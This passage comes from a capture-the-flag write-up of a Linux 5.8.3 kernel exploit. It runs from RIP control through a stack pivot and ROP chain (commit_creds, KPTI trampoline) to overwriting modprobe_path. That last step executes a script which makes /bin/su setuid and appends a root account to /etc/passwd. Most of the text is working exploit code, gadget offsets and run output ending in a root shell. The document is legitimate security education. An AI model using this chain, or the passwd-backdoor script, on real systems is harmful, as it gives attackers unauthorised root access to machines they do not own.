          [+] Kernel base address: 0xfffffffd00000000
          [*] Mmapping page...
          [*] Start monitoring range: 0xdead000 - 0xdeae000
          [*] Triggering page fault...
          [+] Page fault at address 0xdead000!
          [*] Freeing...
          [*] Creating second timer...
          [*] Structure will be overwritten with:
            0000  0xffff88800029b900    0x0000000000000000      
            0010  0x0000000000000000    0x000000000eae0e65      
            0020  0x000000000eae0e65    0x4141414141414141 <- timerfd_tmrproc [1]      
            0030  0xffffffff8183e080    0x0000000000000000      
            0040  0x0000000000000000    0x0000000000000000      
            0050  0x0000000000000000    0x0000000000000000      
            0060  0x0000000000000000    0x0000000000000000      
            0070  0x0000000000000000    0x0000000000000000      
            0080  0xbd7bd3bf6c2aa481    0xffff88800029b988      
            0090  0xffff88800029b988    0x0000000000000000      
            00a0  0x0000000000000000    0xffff88800013f800      
            00b0  0x00000000000000a8    0x0000000000000000      
            00c0  0x0000000000000000    0x0000000000000000      
            00d0  0x0000000000000000    0x0000000000000000      
            00e0  0x0000000000000000    0x0000000000000000    
          general protection fault: 0000 [#1] PTI
          CPU: 0 PID: 66 Comm: exploit Tainted: G           O      5.8.3 #12          
          RIP: 0010:0x4141414141414141 // [2]
          Code: Bad RIP value.
          RSP: 0018:ffffc90000003f18 EFLAGS: 00000006
          [...]

Bingo! As expected, by overwriting timerfd_tmrproc in the timerfd_ctx structure [1], we control the kernel instruction pointer [2]. Now we need to create a ROP-chain, perform stack pivoting and start executing gadgets!

Using gdb we can debug the kernel of the qemu instance (qemu is started with -s, so a gdb stub listens on TCP port 1234). We are interested in the CPU context when timerfd_tmrproc is called. Let’s comment out the following line in our poc:

((unsigned long *)(buff))[0x5] = 0x4141414141414141;

Now we can attach gdb to the kernel and set a breakpoint on timerfd_tmrproc.

When the timer expires, timerfd_tmrproc is executed. As we can see, RDI contains 0xffff88800029bc00, the address of the timerfd_ctx structure in memory. The first field of the structure is the address of the structure itself:

context

In red, we can see the address of the structure itself, in green the timerfd_tmrproc:

context

Since RDI points to the timerfd_ctx structure and we control its first field, we can map a memory region to use as a fake stack:

void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);

and use 0xcafe000 as the first field. Then we can perform stack pivoting by overwriting the timerfd_tmrproc pointer with a gadget like:

0xffffffff81027b86: mov esp, dword ptr [rdi]; lea rax, [rax + rsi*8]; ret;

We can make the following changes in the page_fault_handler() function:

[...]
void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);

((unsigned long *)(buff))[0x0] = (unsigned long)(fake_stack + 0x800);
((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x5] = (unsigned long)(pivot);

unsigned long *rop = (unsigned long *)(fake_stack + 0x800);

*rop ++= 0x4242424242424242;
[...]
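One detail of this pivot is worth spelling out: the gadget loads only the low 32 bits of the first field into ESP, and writing a 32-bit register zero-extends into RSP, so the fake stack has to live below 4 GiB. The following is a minimal sketch that maps the region and checks that constraint. The helper name setup_fake_stack and the PG_SIZE / ROP_OFFSET macros are my own, not taken from the poc, and the sketch passes -1 as the file descriptor, which is the conventional value for anonymous mappings.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdint.h>
#include <sys/mman.h>

#define PG_SIZE         0x1000UL
#define FAKE_STACK_BASE 0xcafe000UL /* same address used in the article */
#define ROP_OFFSET      0x800UL     /* the chain starts in the middle of the page */

/* Maps the fake stack and returns the value to store in the first field
 * of the corrupted structure, or 0 if the mapping failed. */
static unsigned long setup_fake_stack(void)
{
    void *fake_stack = mmap((void *)FAKE_STACK_BASE, PG_SIZE * 5,
                            PROT_READ | PROT_WRITE,
                            MAP_FIXED | MAP_ANONYMOUS | MAP_POPULATE | MAP_PRIVATE,
                            -1, 0);
    if (fake_stack == MAP_FAILED)
        return 0;

    unsigned long pivot_target = (unsigned long)fake_stack + ROP_OFFSET;

    /* "mov esp, dword ptr [rdi]" reads 32 bits only, so the target must
     * fit in 32 bits or the upper half would be lost. */
    assert(pivot_target <= UINT32_MAX);
    return pivot_target;
}
```

Starting the chain at an offset inside the mapping leaves mapped memory below RSP for the functions called from the ROP-chain, which push their own frames.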

Here’s the code of the second POC after applying the aforementioned changes: poc2.c. Let’s execute the exploit again:

            / $ /home/user/poc
            [*] Allocating/Freeing timerfd_ctx structure...
            [*] Leaking timerfd_tmrproc address...
            [+] Object dump:
              0000  0xffff88800029b600    0x0000000000000000      
              0010  0x0000000000000000    0x00000002f21b349d      
              0020  0x00000002f21b349d    0xffffffff81102a00      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd74d3bf6c2aab81    0xffff88800029b688      
              0090  0xffff88800029b688    0x0000000000000000      
              00a0  0x0000000000000000    0xffff88800013f000      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            [+] Leaked timerfd_ctx structure address: 0xffff88800029b600
            [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
            [+] Kernel base address: 0xffffffff00000000
            [*] Mmapping page...
            [*] Start monitoring range: 0xdead000 - 0xdeae000
            [*] Triggering page fault...
            [+] Page fault at address 0xdead000!
            [*] Freeing...
            [*] Creating second timer...
            [*] Structure will be overwritten with:
              0000  0x000000000cafe800    0x0000000000000000      
              0010  0x0000000000000000    0x000000000eae0e65      
              0020  0x000000000eae0e65    0xffffffff81027b86      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd70d3bf6c2aaa81    0xffff88800029b288      
              0090  0xffff88800029b288    0x0000000000000000      
              00a0  0x0000000000000000    0xffff88800013fb00      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            general protection fault: 0000 [#1] PTI
            CPU: 0 PID: 66 Comm: exploit Tainted: G           O      5.8.3 #12
            RIP: 0010:0x4242424242424242 // [1]
            Code: Bad RIP value.
            RSP: 0018:000000000cafe808 EFLAGS: 00000006 // [2]
            [...]

Success! After stack pivoting, we have overwritten RIP with a bunch of “B”s [1], and RSP now contains 0xcafe808 [2]. It’s time to build our ROP-chain!

The exploit - From “B”s to root shell

As a first attempt, let’s try to read the flag. To do so, we can start our ROP-chain with commit_creds(prepare_kernel_cred(0)). In Linux every task has its own cred structure, which specifies the security context of the task. prepare_kernel_cred will allocate a new cred structure with uid, gid etc. set to 0, and commit_creds will apply it to the current task. In this way we will get root privileges.

Then we need to flip bit 12 of the CR3 register to switch back to the user page tables (remember that KPTI is enabled), use swapgs to restore the user GS base, which is saved in an MSR, and then use iretq to return to user space. We can do it in different ways. For example, we can use the symbol swapgs_restore_regs_and_return_to_usermode. Using GDB we can see that swapgs_restore_regs_and_return_to_usermode + 0x35 is a perfect gadget for us:

trampoline

We can find similar instructions where the system returns to user space after a syscall:

trampoline2

The only difference is that the first gadget uses iretq, the second one sysretq:

  • iretq expects the following stack layout when returning to user space:

            +-------------------+
            |        RIP        |
            +-------------------+
            |        CS         |
            +-------------------+
            |       RFLAGS      |           
            +-------------------+
            |        RSP        |
            +-------------------+
            |        SS         |
            +-------------------+

  • sysretq accepts user space RIP from RCX and RFLAGS from R11.
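To make the iretq layout concrete, here is a small sketch of how such a frame could be appended to a ROP-chain. The struct and the push_iret_frame helper are illustrative names of mine and do not appear in the poc. Depending on the entry point chosen inside the trampoline, a few dummy values for the registers it pops first may have to be placed before the frame.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Frame consumed by iretq, lowest address (top of stack) first. */
struct iret_frame {
    uint64_t rip;    /* user space address to resume at */
    uint64_t cs;     /* user code segment selector */
    uint64_t rflags; /* saved flags */
    uint64_t rsp;    /* user space stack pointer */
    uint64_t ss;     /* user stack segment selector */
};

/* Appends the frame to the chain and returns the new write cursor. */
static uint64_t *push_iret_frame(uint64_t *rop, const struct iret_frame *f)
{
    *rop++ = f->rip;
    *rop++ = f->cs;
    *rop++ = f->rflags;
    *rop++ = f->rsp;
    *rop++ = f->ss;
    return rop;
}
```

In a real exploit cs, ss and rflags would come from the values saved before entering the kernel, while rip and rsp point to the user space function and stack we want to land on.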

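We can save the current processor state using the following function (the operand order is Intel syntax, so it presumably relies on the exploit being built with -masm=intel):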

static void save_state()
{
  __asm__ __volatile__(
    "movq %0, cs;"
    "movq %1, ss;"
    "pushfq;"
    "popq %2;"
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags) : : "memory" );
}

And we can read the flag using:

void read_flag()
{
  char flag[100] = {0}; // zero-filled so that puts() always sees a terminator
  read(open("/flag", O_RDONLY), flag, sizeof(flag) - 1);
  puts(flag);
}

If we use the second gadget, our ROP-chain will be:

*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // pkc
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff810537d0UL; // cc
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(read_flag);
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp

Here’s the third poc, poc3.c. Let’s compile and execute it:

            / $ /home/user/poc3
            [*] Allocating/Freeing timerfd_ctx structure...
            [*] Leaking timerfd_tmrproc address...
            [+] Object dump:
              0000  0xffff88800029b800    0x0000000000000000      
              0010  0x0000000000000000    0x00000002de088cb1      
              0020  0x00000002de088cb1    0xffffffff81102a00      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd7ad3bf6c2aae81    0xffff88800029b888      
              0090  0xffff88800029b888    0x0000000000000000      
              00a0  0x0000000000000000    0xffff888000157600      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            [+] Leaked timerfd_ctx structure address: 0xffff88800029b800            
            [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
            [+] Kernel base address: 0xffffffff00000000
            [*] Mmapping page...
            [*] Start monitoring range: 0xdead000 - 0xdeae000
            [*] Triggering page fault...
            [+] Page fault at address 0xdead000!
            [*] Freeing...
            [*] Creating second timer...
            [*] Structure will be overwritten with:
              0000  0x000000000cafe800    0x0000000000000000      
              0010  0x0000000000000000    0x000000000eae0e65      
              0020  0x000000000eae0e65    0xffffffff81027b86      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd7ad3bf6c2aae81    0xffff88800029b888      
              0090  0xffff88800029b888    0x0000000000000000      
              00a0  0x0000000000000000    0xffff888000157600      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            CUCTF{TEST}

            BUG: unable to handle page fault for address: 00000001034cc473
            #PF: supervisor instruction fetch in kernel mode
            [...]

The kernel crashed, but we successfully read the flag (CUCTF{TEST})! Cool, but it’s not enough. We want a shell.

Initially I tried to replace the read_flag() function with:

static void execve_shell(void)
{
  if (getuid() != 0)
  {
    puts("[ERROR] We are not root!");
    exit(1);
  }

  puts("[+] We are root!");
  execve("/bin/sh", 0, 0);
}

but this led to a crash every single time. So I started debugging the kernel, and I finally found a way to get a shell.

First of all, we need to fix the timerfd_ctx structure that we corrupted in the previous steps. I replaced the first address (idx 0) with the original timerfd_ctx structure address, and the sixth address (idx 5, currently our pivot gadget) with the gadget:

    0xffffffff810001dc: ret;    

So when the function pointer is called again, the call will simply return.

// Fix idx 0x0
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff8106e24aUL; // mov rsi, rax; sub rsi, rcx; cmp rdx, rax; cmovs r8, rsi; mov rax, r8; ret;
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;

// Fix idx 0x5
*rop ++= kernel_base + 0xffffffff8113f9b6UL; // pop rdx; ret;
*rop ++= 0x28;
*rop ++= kernel_base + 0xffffffff81012183UL; // add rax, rdx; ret;
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff810001dcUL; // ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;

But even after this change, I couldn’t use system/execve/execveat and so on. So how can we get a shell?

In Linux, when a user executes a file whose header does not match any known binary format, the system calls __request_module, which calls call_modprobe, and call_modprobe uses call_usermodehelper_exec to execute the program specified by modprobe_path. modprobe_path usually corresponds to /sbin/modprobe.

So if we overwrite modprobe_path with the location of a script controlled by us, for example /home/user/x, every time we execute a file with an unknown program header, the system will run our script instead of /sbin/modprobe.

We can use the following function to automatically create a file with an unknown program header (/home/user/asd) and the script that will add a new user (/home/user/x).

void prepare_exploit()
{
  system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /home/user/asd");
  system("chmod +x /home/user/asd");
  system("echo '#!/bin/sh' > /home/user/x");
  system("echo 'chmod +s /bin/su' >> /home/user/x");
  system("echo 'echo \"asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh\" >> /etc/passwd' >> /home/user/x");
  system("chmod +x /home/user/x");
}
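As an alternative to shelling out with system(), the same two files can be created directly with open/write/chmod, which avoids depending on how the shell’s echo handles -e. This is only a sketch: write_file and prepare_files are hypothetical helper names, and the directory is a parameter so the code can be tried outside the challenge environment.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Writes len bytes to path and forces the requested permission bits. */
static int write_file(const char *path, const void *data, size_t len, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, len);
    close(fd);
    if (n != (ssize_t)len)
        return -1;
    return chmod(path, mode); /* open() is subject to umask, chmod() is not */
}

/* Creates <dir>/asd (unknown header) and <dir>/x (the helper script). */
static int prepare_files(const char *dir)
{
    static const unsigned char magic[] = {0xdd, 0xdd, 0xdd, 0xdd, 0xdd, 0xdd, '\n'};
    static const char script[] =
        "#!/bin/sh\n"
        "chmod +s /bin/su\n"
        "echo \"asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh\" >> /etc/passwd\n";
    char path[256];

    snprintf(path, sizeof(path), "%s/asd", dir);
    if (write_file(path, magic, sizeof(magic), 0755) != 0)
        return -1;

    snprintf(path, sizeof(path), "%s/x", dir);
    return write_file(path, script, sizeof(script) - 1, 0755);
}
```

In the challenge environment this would be called as prepare_files("/home/user"), producing the same /home/user/asd and /home/user/x used in the rest of the article.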

Let’s continue our ROP-chain:

// Hijack modprobe_path
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x73752f656d6f682f; // su/emoh/
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL; // modprobe_path
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;

*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x782f7265; // x/re
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL + 8UL; // modprobe_path + 8
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;
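The two constants written to modprobe_path are just the string /home/user/x packed into little-endian 64-bit words, with the unused upper bytes of the second word acting as the terminating NUL. The sketch below derives them from the path instead of hard-coding them; pack_path is a hypothetical helper, not part of the original exploit.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Packs path (including its NUL terminator) into little-endian 64-bit
 * words. Returns the number of words used, or 0 if out is too small. */
static size_t pack_path(const char *path, uint64_t *out, size_t max_words)
{
    size_t len = strlen(path);
    size_t words = (len + 1 + 7) / 8; /* +1 for the terminator */

    if (words > max_words)
        return 0;

    memset(out, 0, words * sizeof(uint64_t));
    for (size_t i = 0; i < len; i++)
        out[i / 8] |= (uint64_t)(unsigned char)path[i] << (8 * (i % 8));
    return words;
}
```

For /home/user/x this yields 0x73752f656d6f682f ("/home/us") and 0x782f7265 ("er/x"), matching the values in the chain. Each word then needs its own pop rdi / pop rsi / mov qword ptr [rsi], rdi triple, with rsi advanced by 8 bytes per word.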

At this point we only need to find a way to avoid a kernel crash. To do so, we can return to user space after hijacking modprobe_path and simply execute:

static void do_nothing(void)
{
  return;
}

In this way, after hijacking modprobe_path, our exploit will exit cleanly and we will be able to execute /home/user/asd to force the kernel to run our malicious script (I also tried to trap the thread using int3 and it worked too):

// pkc -> cc -> kpti trampoline -> userspace -> ret
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // pkc
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff810537d0UL; // cc
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(do_nothing); // return
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp

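It is important to note that, to maximize the exploit success rate, we need precise timing. I found the right compromise using sleep(1.8) before ioctl_userfaultfd and using 0xeae0e65 as the expiration time. Note that sleep() takes an unsigned int number of seconds, so 1.8 is truncated and the call actually sleeps for 1 second. I still have to dig deeper to understand exactly why this delay is needed.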
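Since sleep() only accepts whole seconds, a call such as sleep(1.8) is converted to sleep(1). If a fractional delay is really wanted while tuning the race, nanosleep() is one option. The sketch below uses two hypothetical helpers, ms_to_timespec and sleep_ms, and I have not measured whether a true 1.8 second delay improves or worsens the success rate of this exploit.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <time.h>

/* Converts a non-negative delay in milliseconds to a timespec. */
static struct timespec ms_to_timespec(long ms)
{
    struct timespec ts;

    assert(ms >= 0);
    ts.tv_sec = ms / 1000;
    ts.tv_nsec = (ms % 1000) * 1000000L;
    return ts;
}

/* Sleeps for ms milliseconds; returns 0 on success, -1 if interrupted. */
static int sleep_ms(long ms)
{
    struct timespec ts = ms_to_timespec(ms);
    return nanosleep(&ts, NULL);
}
```

With these helpers, sleep_ms(1800) gives the 1.8 second delay that sleep(1.8) appears to ask for, and sleep_ms(1000) reproduces what the original call actually does.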

This will be our final exploit: exploit.c, utils.h

            / $ /home/user/exploit
            [*] Allocating/Freeing timerfd_ctx structure...
            [*] Leaking timerfd_tmrproc address...
            [+] Object dump:
              0000  0xffff88800029b600    0x0000000000000000      
              0010  0x0000000000000000    0x00000002dc1b84cb      
              0020  0x00000002dc1b84cb    0xffffffff81102a00      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd74d3bf6c2aaa81    0xffff88800029b688      
              0090  0xffff88800029b688    0x0000000000000000      
              00a0  0x0000000000000000    0xffff888000157f00      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            [+] Leaked timerfd_ctx structure address: 0xffff88800029b600            
            [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
            [+] Kernel base address: 0xffffffff00000000
            [+] Modprobe path address: 0xffffffff81837c20
            [*] Mmapping page...
            [*] Start monitoring range: 0xdead000 - 0xdeae000
            [*] Triggering page fault...
            [+] Page fault at address 0xdead000!
            [*] Freeing...
            [*] Creating second timer...
            [*] Structure will be overwritten with:
              0000  0x000000000cafe800    0x0000000000000000      
              0010  0x0000000000000000    0x000000000eae0e65      
              0020  0x000000000eae0e65    0xffffffff81027b86      
              0030  0xffffffff8183e080    0x0000000000000000      
              0040  0x0000000000000000    0x0000000000000000      
              0050  0x0000000000000000    0x0000000000000000      
              0060  0x0000000000000000    0x0000000000000000      
              0070  0x0000000000000000    0x0000000000000000      
              0080  0xbd74d3bf6c2aaa81    0xffff88800029b688      
              0090  0xffff88800029b688    0x0000000000000000      
              00a0  0x0000000000000000    0xffff888000157f00      
              00b0  0x00000000000000a8    0x0000000000000000      
              00c0  0x0000000000000000    0x0000000000000000      
              00d0  0x0000000000000000    0x0000000000000000      
              00e0  0x0000000000000000    0x0000000000000000    
            [*] Fake stack at: 0xcafe000
            [+] Execute: "/home/user/asd" to add a new user: asd / asdasdasd
            / $ cat /etc/passwd
            root:x:0:0:root:/root:/bin/sh
            user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
            / $ /home/user/asd // [1]
            /home/user/asd: line 1: ������: not found
            / $ cat /etc/passwd
            root:x:0:0:root:/root:/bin/sh
            user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
            asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh // [2]
            / $ su asd
            Password:
            / # id
            uid=0(root) gid=0(root) groups=0(root)
            / #

As we can see, when we execute /home/user/asd [1], the kernel calls call_modprobe, but since we replaced modprobe_path with the location of our malicious script, a new user is added [2].

Finally, we can enjoy our root shell!

Challenge link: here.

References

SMEP

KPTI

Misc devices

Slab allocator

timerfd_ctx

Userfaultfd

Exploit scheme

modprobe_path